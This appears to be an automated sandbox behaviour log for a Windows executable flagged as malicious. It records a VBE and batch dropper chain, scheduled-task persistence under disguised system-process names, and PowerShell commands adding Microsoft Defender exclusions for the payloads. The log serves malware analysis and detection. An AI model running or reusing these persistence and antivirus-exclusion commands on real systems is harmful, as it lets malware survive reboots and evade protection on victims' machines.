Source: 4t8f8F3uT1.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 4t8f8F3uT1.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Users\user\Desktop\4t8f8F3uT1.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\4t8f8F3uT1.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 4t8f8F3uT1.exe	Virustotal: Detection: 56%
Source: 4t8f8F3uT1.exe	ReversingLabs: Detection: 65%

Source: C:\Users\user\Desktop\4t8f8F3uT1.exe

File read: C:\Users\user\Desktop\4t8f8F3uT1.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\4t8f8F3uT1.exe "C:\Users\user\Desktop\4t8f8F3uT1.exe"
Source: unknown	Process created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\portcomSurrogateRefSession\QCNKuiZnAzlCwEFS5hObRT3t8.vbe"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\portcomSurrogateRefSession\b85BZX0R6chhd0.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe "C:\portcomSurrogateRefSession/ComwebDriverbroker.exe"
Source: C:\Windows\System32\dllhost.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "smsss" /sc MINUTE /mo 7 /tr "'C:\Users\Default\Pictures\smss.exe'" /f
Source: C:\Windows\System32\dllhost.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Users\Default\Pictures\smss.exe'" /rl HIGHEST /f
Source: C:\Windows\System32\dllhost.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "smsss" /sc MINUTE /mo 7 /tr "'C:\Users\Default\Pictures\smss.exe'" /rl HIGHEST /f
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wt3mav0l\wt3mav0l.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESAB2D.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC5F50EFF8B17D43B99D465AE8464D9.TMP"
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wkjjwbdv\wkjjwbdv.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESAD70.tmp" "c:\Windows\System32\CSCE93499D36A1149A8864C8A5B6E525A2.TMP"
Source: C:\Windows\System32\dllhost.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\java\jre-1.8\bin\Idle.exe'" /f
Source: C:\Windows\System32\dllhost.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files (x86)\java\jre-1.8\bin\Idle.exe'" /rl HIGHEST /f
Source: C:\Windows\System32\dllhost.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\java\jre-1.8\bin\Idle.exe'" /rl HIGHEST /f
Source: C:\Windows\System32\dllhost.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SIUNRHqHRVexchS" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\windowspowershell\Modules\PowerShellGet\1.0.0.1\SIUNRHqHRVexch.exe'" /f
Source: C:\Windows\System32\dllhost.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SIUNRHqHRVexch" /sc ONLOGON /tr "'C:\Program Files (x86)\windowspowershell\Modules\PowerShellGet\1.0.0.1\SIUNRHqHRVexch.exe'" /rl HIGHEST /f
Source: C:\Windows\System32\dllhost.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SIUNRHqHRVexchS" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\windowspowershell\Modules\PowerShellGet\1.0.0.1\SIUNRHqHRVexch.exe'" /rl HIGHEST /f
Source: C:\Windows\System32\dllhost.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SIUNRHqHRVexchS" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\windows portable devices\SIUNRHqHRVexch.exe'" /f
Source: C:\Windows\System32\dllhost.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SIUNRHqHRVexch" /sc ONLOGON /tr "'C:\Program Files (x86)\windows portable devices\SIUNRHqHRVexch.exe'" /rl HIGHEST /f
Source: C:\Windows\System32\dllhost.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SIUNRHqHRVexchS" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\windows portable devices\SIUNRHqHRVexch.exe'" /rl HIGHEST /f
Source: unknown	Process created: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe "C:\Program Files (x86)\java\jre-1.8\bin\Idle.exe"
Source: C:\Windows\System32\dllhost.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Security\BrowserCore\dllhost.exe'" /f
Source: unknown	Process created: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe "C:\Program Files (x86)\java\jre-1.8\bin\Idle.exe"
Source: C:\Windows\System32\dllhost.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\dllhost.exe'" /rl HIGHEST /f
Source: unknown	Process created: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe "C:\Program Files (x86)\windows portable devices\SIUNRHqHRVexch.exe"
Source: C:\Windows\System32\dllhost.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Security\BrowserCore\dllhost.exe'" /rl HIGHEST /f
Source: unknown	Process created: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe "C:\Program Files (x86)\windows portable devices\SIUNRHqHRVexch.exe"
Source: C:\Windows\System32\dllhost.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ComwebDriverbrokerC" /sc MINUTE /mo 5 /tr "'C:\portcomSurrogateRefSession\ComwebDriverbroker.exe'" /f
Source: unknown	Process created: C:\Users\Default\Pictures\smss.exe C:\Users\Default\Pictures\smss.exe
Source: C:\Windows\System32\dllhost.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ComwebDriverbroker" /sc ONLOGON /tr "'C:\portcomSurrogateRefSession\ComwebDriverbroker.exe'" /rl HIGHEST /f
Source: unknown	Process created: C:\Users\Default\Pictures\smss.exe C:\Users\Default\Pictures\smss.exe
Source: C:\Windows\System32\dllhost.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ComwebDriverbrokerC" /sc MINUTE /mo 6 /tr "'C:\portcomSurrogateRefSession\ComwebDriverbroker.exe'" /rl HIGHEST /f
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Pictures\smss.exe'
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\java\jre-1.8\bin\Idle.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windowspowershell\Modules\PowerShellGet\1.0.0.1\SIUNRHqHRVexch.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\SIUNRHqHRVexch.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\dllhost.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\portcomSurrogateRefSession\ComwebDriverbroker.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\HpNAzDiYON.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: unknown	Process created: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe C:\portcomSurrogateRefSession\ComwebDriverbroker.exe
Source: unknown	Process created: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe C:\portcomSurrogateRefSession\ComwebDriverbroker.exe
Source: unknown	Process created: C:\Program Files\Windows Security\BrowserCore\dllhost.exe "C:\Program Files\Windows Security\BrowserCore\dllhost.exe"
Source: unknown	Process created: C:\Program Files\Windows Security\BrowserCore\dllhost.exe "C:\Program Files\Windows Security\BrowserCore\dllhost.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\portcomSurrogateRefSession\QCNKuiZnAzlCwEFS5hObRT3t8.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\portcomSurrogateRefSession\b85BZX0R6chhd0.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe "C:\portcomSurrogateRefSession/ComwebDriverbroker.exe"	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wt3mav0l\wt3mav0l.cmdline"	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wkjjwbdv\wkjjwbdv.cmdline"	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Pictures\smss.exe'	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\java\jre-1.8\bin\Idle.exe'	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windowspowershell\Modules\PowerShellGet\1.0.0.1\SIUNRHqHRVexch.exe'	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\SIUNRHqHRVexch.exe'	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\dllhost.exe'	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\portcomSurrogateRefSession\ComwebDriverbroker.exe'	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\HpNAzDiYON.bat"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESAB2D.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC5F50EFF8B17D43B99D465AE8464D9.TMP"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESAD70.tmp" "c:\Windows\System32\CSCE93499D36A1149A8864C8A5B6E525A2.TMP"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: thumbcache.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Section loaded: version.dll	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
